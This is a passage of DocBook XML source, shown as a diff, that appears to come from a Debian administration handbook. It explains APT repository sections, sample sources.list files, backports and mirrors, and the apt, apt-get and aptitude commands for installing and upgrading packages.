+	<indexterm><primary><literal>main</literal>, section</primary></indexterm>
+	<indexterm><primary>section</primary><secondary><literal>contrib</literal></secondary></indexterm>
+	<indexterm><primary><literal>contrib</literal>, section</primary></indexterm>
+	<indexterm><primary>section</primary><secondary><literal>non-free</literal></secondary></indexterm>
+	<indexterm><primary><literal>non-free</literal>, section</primary></indexterm>
+	<indexterm><primary>component (of a repository)</primary></indexterm>
+
+	<para>Debian uses three sections to differentiate packages according
+	to the licenses chosen by the authors of each work.
+	<literal>Main</literal> gathers all
+	packages which fully comply with the Debian Free Software
+	Guidelines.</para>
+
+	<para>The <literal>non-free</literal> archive is
+	different because it contains software which does not (entirely)
+	conform to these principles but which can nevertheless be distributed
+	without restrictions. This archive, which is not officially part of Debian, is a
+	service for users who could need some of those programs — however Debian
+	always recommends giving priority to free software. The existence of
+	this section represents a considerable problem for Richard M.
+	Stallman and keeps the Free Software Foundation from recommending
+	Debian to users.</para>
+
+	<para><literal>Contrib</literal> (contributions) is a
+	set of open source software which cannot function without some
+	non-free elements. These elements can be software from the
+	<literal>non-free</literal> section, or non-free files
+	such as game ROMs, BIOS of consoles, etc.
+	<literal>Contrib</literal> also includes free software
+	whose compilation requires proprietary elements. This was initially
+	the case for the OpenOffice.org office suite, which used to require a
+	proprietary Java environment.</para>
+      </sidebar>
+
+      <sidebar>
+	<title><emphasis>TIP</emphasis> <filename>/etc/apt/sources.list.d/*.list</filename> files</title>
+
+	<para>If many package sources are referenced, it can be useful to
+	split them in multiple files. Each part is then stored in
+	<filename>/etc/apt/sources.list.d/<replaceable>filename</replaceable>.list</filename>
+	(see sidebar <xref linkend="sidebar.directory.d" />).</para>
+      </sidebar>
+
+      <indexterm><primary><command>apt-cdrom</command></primary></indexterm>
+      <para>The <literal>cdrom</literal> entries describe the CD/DVD-ROMs
+      you have. Contrary to other entries, a CD-ROM is not always available
+      since it has to be inserted into the drive and since only one disc
+      can be read at a time. For those reasons, these sources are managed in a slightly different
+      way, and need to be added with the
+      <command>apt-cdrom</command> program, usually executed with the
+      <literal>add</literal> parameter. The latter will then request the disc
+      to be inserted in the drive and will browse its contents looking for
+      <filename>Packages</filename> files. It will use these files to update
+      its database of available packages (this operation is usually done by the
+      <command>apt update</command> command). From then on, APT can
+      require the disc to be inserted if it needs one of its packages.</para>
+
+    </section>
+    <section>
+      <title>Repositories for <emphasis role="distribution">Stable</emphasis> Users</title>
+      
+      <para>Here is a standard <filename>sources.list</filename> for a system running
+      the <emphasis role="distribution">Stable</emphasis> version of Debian:</para>
+
+      
+      <example id="example.stable-sources-list">
+	<title><filename>/etc/apt/sources.list</filename> file for users of Debian Stable</title>
+
+	<programlisting># Security updates
+deb http://security.debian.org/ stretch/updates main contrib non-free
+deb-src http://security.debian.org/ stretch/updates main contrib non-free
+
+## Debian mirror
+
+# Base repository
+deb http://deb.debian.org/debian stretch main contrib non-free
+deb-src http://deb.debian.org/debian stretch main contrib non-free
+
+# Stable updates
+deb http://deb.debian.org/debian stretch-updates main contrib non-free
+deb-src http://deb.debian.org/debian stretch-updates main contrib non-free
+
+# Stable backports
+deb http://deb.debian.org/debian stretch-backports main contrib non-free
+deb-src http://deb.debian.org/debian stretch-backports main contrib non-free
+</programlisting>
+      </example>
+
+      <para>This file lists all sources of packages associated with the
+      <emphasis role="distribution">Stretch</emphasis> version of Debian
+      (the current <emphasis role="distribution">Stable</emphasis> as of
+      this writing). We opted to name “stretch” explicitly instead of using
+      the corresponding “stable“ alias (<literal>stable</literal>,
+      <literal>stable-updates</literal>, <literal>stable-backports</literal>)
+      because we don't want to have the underlying distribution changed
+      outside of our control when the next stable release comes
+      out.</para>
+
+      <para>Most packages will come from the “base repository” which
+      contains all packages but is seldom updated (about once every 2
+      months for a “point release”). The other repositories are
+      partial (they do not contain all packages) and can host updates
+      (packages with newer version) that APT might install. The following
+      sections will explain the purpose and the rules governing each of
+      those repositories.</para>
+
+      <para>Note that when the desired version of a package is available
+      on several repositories, the first one listed in the
+      <filename>sources.list</filename> file will be used. For this
+      reason, non-official sources are usually added at the end of the
+      file.</para>
+
+      <para>As a side note, most of what this section says about
+      <emphasis role="distribution">Stable</emphasis> applies equally
+      well to <emphasis role="distribution">Oldstable</emphasis> since
+      the latter is just an older <emphasis role="distribution">Stable</emphasis>
+      that is maintained in parallel.</para>
+
+      <section id="sect.security-updates">
+        <title>Security Updates</title>
+	<indexterm><primary><literal>security.debian.org</literal></primary></indexterm>
+	<indexterm><primary>security updates</primary></indexterm>
+	<indexterm><primary>updates</primary><secondary>security updates</secondary></indexterm>
+
+	<para>The security updates are not hosted on the usual network of
+	Debian mirrors but on <literal>security.debian.org</literal> (on a
+	small set of machines maintained by the <link linkend="dsa-team">Debian System
+	Administrators</link>). This archive contains security updates (prepared
+	by the Debian Security Team and/or by package maintainers) for the
+	<emphasis role="distribution">Stable</emphasis> distribution.</para>
+
+	<para>The server can also host security updates for <emphasis role="distribution">Testing</emphasis> but this doesn't happen very
+	often since those updates tend to reach <emphasis role="distribution">Testing</emphasis> via the regular flow of
+	updates coming from <emphasis role="distribution">Unstable</emphasis>.</para>
+      </section>
+
+      <section id="sect.stable-updates">
+        <title>Stable Updates</title>
+	<indexterm><primary>stable updates</primary></indexterm>
+	<indexterm><primary><literal>stable-updates</literal></primary></indexterm>
+	<indexterm><primary>updates</primary><secondary>stable updates</secondary></indexterm>
+
+	<para>Stable updates are not security sensitive but are deemed
+	important enough to be pushed to users before the next stable
+	point release.</para>
+
+	<para>This repository will typically contain fixes for critical
+	bugs which could not be fixed before release or which have been
+	introduced by subsequent updates. Depending on the urgency, it can
+	also contain updates for packages that have to evolve over time…
+	like <emphasis role="pkg">spamassassin</emphasis>'s spam detection
+	rules, <emphasis role="pkg">clamav</emphasis>'s virus database, or
+	the daylight-saving time rules of all timezones (<emphasis role="pkg">tzdata</emphasis>).</para>
+
+	<para>In practice, this repository is a subset of the
+	<literal>proposed-updates</literal> repository, carefully selected
+	by the Stable Release Managers.</para>
+      </section>
+
+      <section id="sect.proposed-updates">
+        <title>Proposed Updates</title>
+        <indexterm><primary><literal>proposed-updates</literal></primary></indexterm>
+        <indexterm><primary><literal>stable-proposed-updates</literal></primary></indexterm>
+
+	<para>Once published, the <emphasis role="distribution">Stable</emphasis> distribution is only updated
+	about once every 2 months. The <literal>proposed-updates</literal>
+	repository is where the expected updates are prepared (under the
+	supervision of the Stable Release Managers).</para>
+
+	<para>The security and stable updates documented in the former
+	sections are always included in this repository, but there is more
+	too, because package maintainers also have the opportunity to fix
+	important bugs that do not deserve an immediate release.</para>
+	
+	<para>Anyone can use this repository
+	to test those updates before their official publication. The
+	extract below uses the <literal>stretch-proposed-updates</literal>
+	alias which is both more explicit and more consistent since
+	<literal>jessie-proposed-updates</literal> also exists (for the
+	<emphasis role="distribution">Oldstable</emphasis> updates):</para>
+
+        <programlisting>deb http://ftp.debian.org/debian stretch-proposed-updates main contrib non-free
+</programlisting>
+      </section>
+
+      <section id="sect.backports">
+        <title>Stable Backports</title>
+        <indexterm><primary><literal>stable-backports</literal></primary></indexterm>
+        <indexterm><primary>backport</primary></indexterm>
+	<indexterm><primary>updates</primary><secondary>backports</secondary></indexterm>
+
+	<para>The <literal>stable-backports</literal> repository hosts
+	“package backports”. The term refers to a package of some recent
+	software which has been recompiled for an older distribution,
+	generally for <emphasis role="distribution">Stable</emphasis>.
+	</para>
+
+	<para>When the distribution
+	becomes a little dated, numerous software projects have released
+	new versions that are not integrated into the current <emphasis role="distribution">Stable</emphasis> (which is only modified to
+	address the most critical problems, such as security problems).
+	Since the <emphasis role="distribution">Testing</emphasis> and
+	<emphasis role="distribution">Unstable</emphasis> distributions can
+	be more risky, package maintainers sometimes offer recompilations of
+	recent software applications for <emphasis role="distribution">Stable</emphasis>, which has the advantage to
+	limit potential instability to a small number of chosen packages.
+	<ulink type="block" url="http://backports.debian.org" />
+	</para>
+        <indexterm><primary><literal>backports.debian.org</literal></primary></indexterm>
+
+	<para>Backports from <literal>stable-backports</literal> are
+	always created from packages available in <emphasis role="distribution">Testing</emphasis>. This ensures that all
+	installed backports will be upgradable to the corresponding stable
+	version once the next stable release of Debian is available.
+	</para>
+
+	<para>Even though this repository provides newer versions of
+	packages, APT will not install them unless you give explicit
+	instructions to do so (or unless you have already done so with a
+	former version of the given backport): </para>
+
+	<screen><computeroutput>$ </computeroutput><userinput>sudo apt-get install <replaceable>package</replaceable>/stretch-backports
+</userinput><computeroutput>$ </computeroutput><userinput>sudo apt-get install -t stretch-backports <replaceable>package</replaceable>
+</userinput></screen>
+
+      </section>
+    </section>
+
+    <section>
+      <title>Repositories for <emphasis role="distribution">Testing</emphasis>/<emphasis role="distribution">Unstable</emphasis> Users</title>
+
+      <para>Here is a standard <filename>sources.list</filename> for a
+      system running the <emphasis role="distribution">Testing</emphasis>
+      or <emphasis role="distribution">Unstable</emphasis> version of
+      Debian:</para>
+
+      <example id="example.testing-sources-list">
+	<title><filename>/etc/apt/sources.list</filename> file for users of Debian
+	<emphasis role="distribution">Testing</emphasis>/<emphasis role="distribution">Unstable</emphasis></title>
+
+	<programlisting>
+# Unstable
+deb http://deb.debian.org/debian unstable main contrib non-free
+deb-src http://deb.debian.org/debian unstable main contrib non-free
+
+# Testing
+deb http://deb.debian.org/debian testing main contrib non-free
+deb-src http://deb.debian.org/debian testing main contrib non-free
+
+# Stable
+deb http://deb.debian.org/debian stable main contrib non-free
+deb-src http://deb.debian.org/debian stable main contrib non-free
+
+# Security updates
+deb http://security.debian.org/ stable/updates main contrib non-free
+deb http://security.debian.org/ testing/updates main contrib non-free
+deb-src http://security.debian.org/ stable/updates main contrib non-free
+deb-src http://security.debian.org/ testing/updates main contrib non-free
+</programlisting>
+      </example>
+
+      <para>With this <filename>sources.list</filename> file APT will
+      install packages from <emphasis role="distribution">Unstable</emphasis>.  If that is not desired,
+      use the <literal>APT::Default-Release</literal> setting (see <xref linkend="sect.apt-upgrade" />) to instruct APT to pick
+      packages from another distribution (most likely <emphasis role="distribution">Testing</emphasis> in this case).</para>
+
+      <para>There are good reasons to include all those repositories, even
+      though a single one should be enough. <emphasis role="distribution">Testing</emphasis> users will appreciate the
+      possibility to cherry-pick a fixed package from <emphasis role="distribution">Unstable</emphasis> when the version in
+      <emphasis role="distribution">Testing</emphasis> is affected by an
+      annoying bug. On the opposite, <emphasis role="distribution">Unstable</emphasis> users bitten by unexpected
+      regressions have the possibility to downgrade packages to their
+      (supposedly working) <emphasis role="distribution">Testing</emphasis> version.</para>
+
+      <para>The inclusion of <emphasis role="distribution">Stable</emphasis>
+      is more debatable but it often gives access to some packages which
+      have been removed from the development versions. It also ensures that
+      you get the latest updates for packages which have not been modified
+      since the last stable release.</para>
+
+      <section>
+        <title>The <emphasis role="distribution">Experimental</emphasis> Repository</title>
+        <indexterm><primary><emphasis role="distribution">Experimental</emphasis></primary></indexterm>
+
+	<para>The archive of <emphasis role="distribution">Experimental</emphasis> packages is present on
+	all Debian mirrors, and contains packages which are not in the
+	<emphasis role="distribution">Unstable</emphasis> version yet
+	because of their substandard quality — they are often software
+	development versions or pre-versions (alpha, beta, release
+	candidate…). A package can also be sent there after undergoing
+	subsequent changes which can generate problems. The maintainer then
+	tries to uncover them with help from advanced users who can handle
+	important issues. After this first stage, the package is moved into
+	<emphasis role="distribution">Unstable</emphasis>, where it reaches
+	a much larger audience and where it will be tested in much more
+	detail.</para>
+
+	<para><emphasis role="distribution">Experimental</emphasis> is
+	generally used by users who do not mind breaking their system and
+	then repairing it. This distribution gives the possibility to
+	import a package which a user wants to try or use as the need
+	arises. That is exactly how Debian approaches it, since adding it
+	in APT's <filename>sources.list</filename> file does not lead to
+	the systematic use of its packages. The line to be added is:</para>
+        <informalexample>
+          <programlisting>deb http://deb.debian.org/debian experimental main contrib non-free
+</programlisting>
+        </informalexample>
+      </section>
+    </section>
+
+    <section>
+      <title>Using Alternate Mirrors</title>
+
+      <indexterm><primary><literal>deb.debian.org</literal></primary></indexterm>
+      <para>
+        The <filename>sources.list</filename> examples in this chapter
+        refer to package repositories hosted on <literal>deb.debian.og</literal>.
+        Those URLs will redirect you to servers which are close to you and which
+        are managed by Content Delivery Networks (<acronym>CDN</acronym>) whose
+        main role is to store multiple copies of the files across the world to
+        deliver them as fast as possible to users. The CDN companies that
+        Debian is working with are Debian partners who are offering their
+        services freely to Debian. While none of those servers are under
+        direct control of Debian, the fact that the whole archive is
+        sealed by GPG signatures makes it a non-issue.
+      </para>
+
+      <indexterm><primary>mirror list</primary></indexterm>
+      <indexterm><primary>list of mirrors</primary></indexterm>
+      <para>
+        Picky users who are not satisfied with the performance of
+        <literal>deb.debian.org</literal> can try to find a better mirror
+        in the official mirror list:
+        <ulink type="block" url="https://www.debian.org/mirror/list" />
+      </para>
+
+      <para>
+        But when you don't know which mirror is best for you, this list is of
+        not much use. Fortunately for you, Debian maintains DNS entries
+        of the form
+        <literal>ftp.<replaceable>country-code</replaceable>.debian.org</literal>
+        (e.g. <literal>ftp.us.debian.org</literal> for the USA,
+        <literal>ftp.fr.debian.org</literal> for France, etc.) which are
+        covering many countries and which are pointing to one (or more) of
+        the best mirrors available within that country.
+      </para>
+
+      <indexterm><primary><literal>httpredir.debian.org</literal></primary></indexterm>
+      <para>
+        As an alternative to <literal>deb.debian.org</literal>, there used
+        to be <literal>httpredir.debian.org</literal>. This service would
+        identify a mirror close to you (among the list of official
+        mirrors, using GeoIP mainly) and would redirect APT's requests to
+        that mirror. This service has been deprecated due to reliability
+        concerns and now <literal>httpredir.debian.org</literal> provides
+        the same CDN-based service as <literal>deb.debian.org</literal>.
+      </para>
+    </section>
+
+    <section>
+      <title>Non-Official Resources: <literal>mentors.debian.net</literal></title>
+      <indexterm><primary><literal>mentors.debian.net</literal></primary></indexterm>
+
+      <para>There are numerous non-official sources of Debian packages set
+      up by advanced users who have recompiled some software (Ubuntu made
+      this popular with their Personal Package Archive service), by
+      programmers who make their creation available to all, and even by
+      Debian developers who offer pre-versions of their package online.</para>
+
+      <para>The <literal>mentors.debian.net</literal> site is
+      interesting (although it only provides source packages), since it
+      gathers packages created by candidates to the status of
+      official Debian developer or by volunteers who wish to create Debian
+      packages without going through that process of integration. These
+      packages are made available without any guarantee regarding their
+      quality; make sure that you check their origin and integrity and
+      then test them before you consider using them in production.</para>
+
+      <sidebar>
+        <title><emphasis>COMMUNITY</emphasis> The <literal>debian.net</literal> sites</title>
+        <indexterm><primary><emphasis>debian.net</emphasis></primary></indexterm>
+
+	<para>The <emphasis>debian.net</emphasis> domain is not an official
+	resource of the Debian project. Each Debian developer may use that
+	domain name for their own use. These websites can contain
+	unofficial services (sometimes personal sites) hosted on a machine
+	which does not belong to the project and set up by Debian
+	developers, or even prototypes about to be moved on to
+	<emphasis>debian.org</emphasis>. Two reasons can explain why some
+	of these prototypes remain on <emphasis>debian.net</emphasis>:
+	either no one has made the necessary effort to transform it into an
+	official service (hosted on the <emphasis>debian.org</emphasis>
+	domain, and with a certain guarantee of maintenance), or the
+	service is too controversial to be officialized.</para>
+      </sidebar>
+
+      <para>Installing a package means giving root rights to its creator,
+      because they decide on the contents of the initialization scripts
+      which are run under that identity. Official Debian packages are
+      created by volunteers who have been co-opted and reviewed and who can
+      seal their packages so that their origin and integrity can be
+      checked.</para>
+
+      <para>In general, be wary of a package whose origin you don't know
+      and which isn't hosted on one of the official Debian servers:
+      evaluate the degree to which you can trust the creator, and check the
+      integrity of the package. <ulink type="block" url="http://mentors.debian.net/" /></para>
+
+      <sidebar id="sidebar.snapshot.debian.org">
+        <title><emphasis>GOING FURTHER</emphasis> Old package versions: <literal>snapshot.debian.org</literal></title>
+        <indexterm><primary><literal>snapshot.debian.org</literal></primary></indexterm>
+
+	<para>The <literal>snapshot.debian.org</literal> service,
+	introduced in April 2010, can be used to “go backwards in
+	time” and to find an old version of a package. It can be used
+	for example to identify which version of a package introduced
+	a regression, and more concretely, to come back to the former
+	version while waiting for the regression fix.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Caching Proxy for Debian Packages</title>
+      <indexterm><primary>proxy cache</primary></indexterm>
+      <indexterm><primary>cache, proxy</primary></indexterm>
+
+      <para>When an entire network of machines is configured to use the same
+      remote server to download the same updated packages, any administrator
+      knows that it would be beneficial to have an intermediate proxy acting
+      as a network-local cache (see sidebar <xref linkend="sidebar.cache" />).</para>
+
+      <para>You can configure APT to use a "standard" proxy (see <xref linkend="sect.apt-config" /> for the APT side, and <xref linkend="sect.http-ftp-proxy" /> for the proxy side), but the Debian
+      ecosystem offers better options to solve this problem. The dedicated
+      software presented in this section are smarter than a plain proxy
+      cache because they can rely on the specific structure of APT
+      repositories (for instance they know when individual files are
+      obsolete or not, and thus adjust the time during which they are
+      kept).</para>
+
+      <indexterm><primary><emphasis role="pkg">apt-cacher</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">apt-cacher-ng</emphasis></primary></indexterm>
+      <para><emphasis role="pkg">apt-cacher</emphasis> and
+      <emphasis role="pkg">apt-cacher-ng</emphasis> work like usual
+      proxy cache servers. APT's <filename>sources.list</filename> is left
+      unchanged, but APT is configured to use them as proxy for outgoing
+      requests.</para>
+      
+      <indexterm><primary><emphasis role="pkg">approx</emphasis></primary></indexterm>
+      <para><emphasis role="pkg">approx</emphasis>, on the other hand, acts
+      like an HTTP server that “mirrors” any number of remote repositories
+      in its top-level URLs. The mapping between those top-level directories and
+      the remote URLs of the repositories is stored in
+      <filename>/etc/approx/approx.conf</filename>:</para>
+
+      <programlisting>
+# &lt;name&gt; &lt;repository-base-url&gt;
+debian   http://deb.debian.org/debian
+security http://security.debian.org
+</programlisting>
+
+      <para><emphasis role="pkg">approx</emphasis> runs by default on
+      port 9999 via a systemd socket and requires
+      the users to adjust their <filename>sources.list</filename> file to point
+      to the approx server:</para>
+
+      <programlisting># Sample sources.list pointing to a local approx server
+deb http://apt.falcot.com:9999/security stretch/updates main contrib non-free
+deb http://apt.falcot.com:9999/debian stretch main contrib non-free
+      </programlisting>
+    </section>
+
+  </section>
+  <section id="sect.apt-get">
+    <title><command>aptitude</command>, <command>apt-get</command>, and <command>apt</command> Commands</title>
+    <indexterm><primary><command>apt</command></primary></indexterm>
+    <indexterm><primary><command>apt-get</command></primary></indexterm>
+    <indexterm><primary><command>aptitude</command></primary></indexterm>
+
+    <para>APT is a vast project, whose original plans included a graphical
+    interface. It is based on a library which contains the core
+    application, and <command>apt-get</command> is the first front end —
+    command-line based — which was developed within the project.
+    <command>apt</command> is a second command-line based front end
+    provided by APT which overcomes some design mistakes of
+    <command>apt-get</command>.</para>
+  
+    <para>Both tools are built on top of the same library and are thus
+    very close but the default behaviour of <command>apt</command> has
+    been improved for interactive use and to actually do what most users
+    expect. APT's developers reserve the right to change the public
+    interface of this tool to further improve it. On the opposite, the
+    public interface of <command>apt-get</command> is well defined and
+    will not change in any backwards incompatible way. It is thus the tool
+    that you want to use when you need to script package installation
+    requests.</para>
+
+    <para>Numerous other graphical interfaces then appeared as external
+    projects: <command>synaptic</command>, <command>aptitude</command>
+    (which includes both a text mode interface and a graphical one — even
+    if not complete yet), <command>wajig</command>, etc. The most
+    recommended interface, <command>apt</command>, is the one that we will use
+    in the examples given in this section. Note however that <command>apt-get</command> and
+    <command>aptitude</command> have a very similar command line syntax.
+    When there are major differences between <command>apt</command>,
+    <command>apt-get</command> and <command>aptitude</command>, these
+    differences will be detailed.</para>
+    <section>
+      <title>Initialization</title>
+
+      
+      <para>For any work with APT, the list of available packages needs to
+      be updated; this can be done simply through <command>apt
+      update</command>. Depending on the speed of your connection, the
+      operation can take a while since it involves downloading a certain
+      number of <filename>Packages</filename>/<filename>Sources</filename>/<filename>Translation-<replaceable>language-code</replaceable></filename> files, which have gradually become
+      bigger and bigger as Debian has developed (at least 10 MB of data for the
+      <literal>main</literal> section). Of course, installing from a CD-ROM
+      set does not require any downloading — in this case, the operation
+      is very fast.</para>
+      <indexterm><primary><command>apt update</command></primary></indexterm>
+      <indexterm><primary><command>apt-get update</command></primary></indexterm>
+      <indexterm><primary><command>aptitude update</command></primary></indexterm>
+    </section>
+    <section>
+      <title>Installing and Removing</title>
+      <indexterm><primary>package</primary><secondary>installation</secondary></indexterm>
+      <indexterm><primary>package</primary><secondary>removal</secondary></indexterm>
+      <indexterm><primary>installation</primary><secondary>package installation</secondary></indexterm>
+      <indexterm><primary>removal of a package</primary></indexterm>
+
+      <para>With APT, packages can be added or removed from the system,
+      respectively with <command>apt install
+      <replaceable>package</replaceable></command> and <command>apt
+      remove <replaceable>package</replaceable></command>. In both cases,
+      APT will automatically install the necessary dependencies or delete
+      the packages which depend on the package that is being removed. The
+      <command>apt purge <replaceable>package</replaceable></command>
+      command involves a complete uninstallation — the configuration files
+      are also deleted.</para>
+      <indexterm><primary><command>apt install</command></primary></indexterm>
+      <indexterm><primary><command>apt remove</command></primary></indexterm>
+      <indexterm><primary><command>apt purge</command></primary></indexterm>
+      <indexterm><primary><command>apt-get install</command></primary></indexterm>
+      <indexterm><primary><command>apt-get remove</command></primary></indexterm>
+      <indexterm><primary><command>apt-get purge</command></primary></indexterm>
+      <indexterm><primary><command>aptitude install</command></primary></indexterm>
+      <indexterm><primary><command>aptitude remove</command></primary></indexterm>
+      <indexterm><primary><command>aptitude purge</command></primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Installing the same selection of packages several times</title>
+
+	<para>It can be useful to systematically install the same list of
+	packages on several computers. This can be done quite
+	easily.</para>
+
+	<para>First, retrieve the list of packages installed on the
+	computer which will serve as the “model” to copy.</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>dpkg --get-selections &gt;pkg-list</userinput>
+</screen>
+
+	<para>The <filename>pkg-list</filename> file then contains the list
+	of installed packages. Next, transfer the
+	<filename>pkg-list</filename> file onto the computers you want to
+	update and use the following commands:</para>
+
+        <screen>## Update dpkg's database of known packages
+# <userinput>avail=`mktemp`</userinput>
+# <userinput>apt-cache dumpavail &gt; "$avail"</userinput>
+# <userinput>dpkg --merge-avail "$avail"</userinput>
+# <userinput>rm -f "$avail"</userinput>
+## Update dpkg's selections
+# <userinput>dpkg --set-selections &lt; pkg-list</userinput>
+## Ask apt-get to install the selected packages
+# <userinput>apt-get dselect-upgrade</userinput>
+</screen>
+
+	<para>The first commands records the list of available packages
+	in the dpkg database, then <command>dpkg --set-selections</command>
+	restores the selection of packages that you wish to install, and the
+	<command>apt-get</command> invocation executes
+	the required operations! <command>aptitude</command> does not have
+	this command.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Removing and installing at the same time</title>
+
+        <para>It is possible to ask <command>apt</command> (or <command>apt-get</command>, or
+	<command>aptitude</command>) to install certain packages and remove
+	others on the same command line by adding a suffix. With an
+	<command>apt install</command> command, add
+	“<literal>-</literal>” to the names of the packages you wish to
+	remove. With an <command>apt remove</command> command, add
+	“<literal>+</literal>” to the names of the packages you wish to
+	install.</para>
+
+	<para>The next example shows two different ways to install
+	<replaceable>package1</replaceable> and to remove
+	<replaceable>package2</replaceable>.</para>
+
+        <screen># <userinput>apt install <replaceable>package1</replaceable> <replaceable>package2-</replaceable></userinput>
+[...]
+# <userinput>apt remove <replaceable>package1+</replaceable> <replaceable>package2</replaceable></userinput>
+[...]
+</screen>
+
+	<para>This can also be used to exclude packages which would
+	otherwise be installed, for example due to a
+	<literal>Recommends</literal>. In general, the dependency solver
+	will use that information as a hint to look for alternative
+	solutions.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> <command>apt --reinstall</command> and <command>aptitude reinstall</command></title>
+        <indexterm><primary>reinstallation</primary></indexterm>
+
+	<para>The system can sometimes be damaged after the removal or
+	modification of files in a package. The easiest way to retrieve
+	these files is to reinstall the affected package. Unfortunately,
+	the packaging system finds that the latter is already installed and
+	politely refuses to reinstall it; to avoid this, use the
+	<literal>--reinstall</literal> option of the
+        <command>apt</command> and <command>apt-get</command> commands. The following command
+	reinstalls <emphasis role="pkg">postfix</emphasis> even if it is
+	already present:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>apt --reinstall install postfix</userinput>
+</screen>
+
+	<para>The <command>aptitude</command> command line is slightly
+	different, but achieves the same result with <command>aptitude
+	reinstall postfix</command>.</para>
+
+	<para>The problem does not arise with <command>dpkg</command>, but
+	the administrator rarely uses it directly.</para>
+
+	<para>Be careful! Using <command>apt --reinstall</command> to
+	restore packages modified during an attack will certainly not recover
+	the system as it was. <xref linkend="sect.dealing-with-compromised-machine" /> details the
+	necessary steps to take with a compromised system.</para>
+      </sidebar>
+
+      <para>If the file <filename>sources.list</filename> mentions several
+      distributions, it is possible to give the version of the package to
+      install. A specific version number can be requested with
+      <command>apt install
+      <replaceable>package</replaceable>=<replaceable>version</replaceable></command>,
+      but indicating its distribution of origin (<emphasis role="distribution">Stable</emphasis>, <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis>) — with <command>apt
+      install
+      <replaceable>package</replaceable>/<replaceable>distribution</replaceable></command>
+      — is usually preferred. With this command, it is possible to go
+      back to an older version of a package (if for instance you know that
+      it works well), provided that it is still available in one of the
+      sources referenced by the <filename>sources.list</filename> file.
+      Otherwise the <literal>snapshot.debian.org</literal> archive can come
+      to the rescue (see sidebar <xref linkend="sidebar.snapshot.debian.org" />).</para>
+
+      <example>
+        <title>Installation of the <emphasis role="distribution">unstable</emphasis> version of <emphasis role="pkg">spamassassin</emphasis></title>
+
+        <screen><computeroutput># </computeroutput><userinput>apt install spamassassin/unstable</userinput>
+</screen>
+      </example>
+
+      <para>If the package to install has been made available to you under
+        the form of a simple <filename>.deb</filename> file without any associated
+        package repository, it is still possible to use APT to install it together
+        with its dependencies (provided that the dependencies are available in
+        the configured repositories) with a simple command: <command>apt install ./<replaceable>path-to-the-package.deb</replaceable></command>. The leading <literal>./</literal>
+        is important to make it clear that we are referring to a filename and not
+        to the name of a package available in one of the repositories.
+      </para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> The cache of <filename>.deb</filename> files</title>
+
+	<para>APT keeps a copy of each downloaded
+	<filename>.deb</filename> file in the directory
+	<filename>/var/cache/apt/archives/</filename>. In case of
+	frequent updates, this directory can quickly take a lot of
+	disk space with several versions of each package; you should
+	regularly sort through them. Two commands can be used:
+	<command>apt-get clean</command> entirely empties the
+	directory; <command>apt-get autoclean</command> only removes
+	packages which can no longer be downloaded (because they have
+	disappeared from the Debian mirror) and are therefore clearly
+	useless (the configuration parameter
+	<literal>APT::Clean-Installed</literal> can prevent the
+	removal of <filename>.deb</filename> files that are currently
+        installed).</para>
+      </sidebar>
+    </section>
+
+    <section id="sect.apt-upgrade">
+      <title>System Upgrade</title>
+      <indexterm><primary>upgrade</primary><secondary>system upgrade</secondary></indexterm>
+
+      <indexterm><primary><command>apt upgrade</command></primary></indexterm>
+      <indexterm><primary><command>apt-get upgrade</command></primary></indexterm>
+      <indexterm><primary><command>aptitude safe-upgrade</command></primary></indexterm>
+      <para>Regular upgrades are recommended, because they include the
+      latest security updates. To upgrade, use <command>apt upgrade</command>,
+      <command>apt-get upgrade</command> or <command>aptitude safe-upgrade</command> (of
+      course after <command>apt update</command>). This command looks
+      for installed packages which can be upgraded without removing any
+      packages. In other words, the goal is to ensure the least intrusive
+      upgrade possible. <command>apt-get</command> is slightly more
+      demanding than <command>aptitude</command> or <command>apt</command>
+      because it will refuse to install packages which were not installed
+      beforehand.</para>
+
+      <sidebar id="sidebar.apt-pdiff">
+        <title><emphasis>TIP</emphasis> Incremental upgrade</title>
+
+	
+	<para>As we explained earlier, the aim of the <command>apt
+	update</command> command is to download for each package source the
+	corresponding <filename>Packages</filename> (or
+	<filename>Sources</filename>) file. However, even after a
+	<command>xz</command> compression, these files can remain rather
+	large (the <filename>Packages.xz</filename> for the
+	<foreignphrase>main</foreignphrase> section of <emphasis role="distribution">Stretch</emphasis> takes more than 6 MB). If
+	you wish to upgrade regularly, these downloads can take up a lot of
+	time.</para>
+
+	<para>To speed up the process APT can download “diff” files containing
+	the changes since the previous update, as opposed to the entire
+	file. To achieve this, official Debian mirrors distribute different
+	files which list the differences between one version of the
+	<filename>Packages</filename> file and the following version. They
+	are generated at each update of the archives and a history of one
+	week is kept. Each of these “diff” files only takes a few dozen
+	kilobytes for <emphasis role="distribution">Unstable</emphasis>, so
+	that the amount of data downloaded by a weekly <command>apt
+	update</command> is often divided by 10. For distributions like
+	<emphasis role="distribution">Stable</emphasis> and <emphasis role="distribution">Testing</emphasis>, which change less, the gain
+	is even more noticeable.</para>
+
+	<para>However, it can sometimes be of interest to force the
+	download of the entire <filename>Packages</filename> file,
+	especially when the last upgrade is very old and when the mechanism
+	of incremental differences would not contribute much. This can also
+	be interesting when network access is very fast but when the
+	processor of the machine to upgrade is rather slow, since the time
+	saved on the download is more than lost when the computer
+	calculates the new versions of these files (starting with the older
+	versions and applying the downloaded differences). To do that, you
+	can use the configuration parameter
+	<literal>Acquire::Pdiffs</literal> and set it to
+	<literal>false</literal>.</para>
+      </sidebar>
+
+      <para><command>apt</command> will generally select the most
+      recent version number (except for packages from <emphasis role="distribution">Experimental</emphasis> and
+      <emphasis role="distribution">stable-backports</emphasis>, which are
+      ignored by default whatever their version number). If you specified
+      <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis> in your
+      <filename>sources.list</filename>, <command>apt
+      upgrade</command> will switch most of your <emphasis role="distribution">Stable</emphasis> system to <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis>, which might not be what you
+      intended.</para>
+
+      <para>To tell <command>apt</command> to use a specific
+      distribution when searching for upgraded packages, you need to use
+      the <literal>-t</literal> or <literal>--target-release</literal>
